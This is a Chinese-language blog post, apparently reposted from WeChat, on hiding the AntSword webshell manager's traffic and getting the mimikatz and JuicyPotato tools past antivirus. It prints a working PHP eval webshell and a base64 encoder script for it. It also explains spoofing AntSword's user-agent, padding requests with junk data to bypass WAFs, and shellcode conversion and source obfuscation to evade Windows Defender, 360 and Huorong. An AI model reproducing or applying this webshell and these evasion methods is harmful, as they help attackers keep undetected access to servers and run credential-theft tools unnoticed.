前言:摸鱼玩了几天是真的玩的那种笑死 啥都没学
本来说大前天就把这玩意整完的 几天就干了一点事情
其中cs的一些东西和frp改造还没玩明白 不过暂时就这样吧 内核的很多还是玩不明白 先放着吧以后在学了
摸鱼玩其他的去
正文:
蚁剑隐藏特征+自定义编码器
正常蚁剑的几个特征
①user-agent流量特征
②shellcode未加密流量特征
后面补的所有上面的useragent已经被改了
改造
①shellcode未加密流量特征思路
一个编码项目
https://codeload.github.com/xiaopan233/AntSword-Cryption-WebShell/zip/refs/heads/main
base64思路
这里以最基础的base64加密为例
新加一个编码器 然后内容如下即可
/**
* php::base64编码器
* Create at: 2018/12/29 09:12:22
*/
'use strict';
/*
* @param {String} pwd 连接密码
* @param {Array} data 编码器处理前的 payload 数组
* @return {Array} data 编码器处理后的 payload 数组
*/
module.exports = (pwd, data) => {
data[pwd] = new Buffer(data['_']).toString('base64');
delete data['_'];
// 返回编码器处理后的 payload 数组
return data;
}
shellcode代码
<?php @eval(base64_decode($_POST['shell'])); ?>
蚁剑自带rsa加密
copy php代码然后正常连接即可
然后把shellcode扔服务器上 然后进行配置编码器设置为我们设置的那个即可
②更改user-agent
更改module文件下的 这两个文件内容即可
改成我们想伪造的即可 然后重启即可
③其余自选功能
加点垃圾数据和分块这些去过一些垃圾waf
这样一来神仙都难说是
这个去配置urlblacklist 把要过滤的删了改了即可
猕猴桃免杀
这里只分享思路 不放东西
将猕猴桃的exe做个简单免杀然后exe转shellcode 然后就变成我们常规使用的分离加载以及编码加解密shellcode免杀的思路了
有人说猕猴桃走源码免杀
不是说不可以 但是咋说呢 耗时间 特征定位耗费一堆时间哪怕用myccl去做特征定位 我也觉得蛮耗时间的 而且特征这块火绒杀的蛮死的 对我来说能转换为其他思路做就绝不用这种
没开启样本上传的360倒是可以不杀
juicepotao免杀
这种其实也可以转shellcode然后走分离 但是考虑到具体版本clsid不灵活的特点
我这里没想出其他的多好的思路,还是走的源码免杀 就是常规的替换参数替换资源混淆代码执行逻辑
效果如下
wdf+360+火绒全过
原文始发于微信公众号(goddemon的小屋):工具绕防
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论